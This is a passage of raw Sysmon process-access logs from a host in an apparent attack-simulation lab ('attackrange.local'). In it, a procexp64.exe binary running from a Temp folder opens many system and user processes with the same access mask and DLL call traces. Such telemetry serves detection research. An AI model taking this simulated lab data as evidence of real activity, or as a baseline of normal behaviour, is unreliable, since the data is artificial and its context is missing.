l+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789825Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789824Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789823Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789822Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789821Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789820Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789819Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789818Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789817Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789816Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789815Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789814Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789813Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789812Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789811Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789810Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789809Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789808Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789807Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789806Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789805Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789804Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789803Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789802Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789801Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 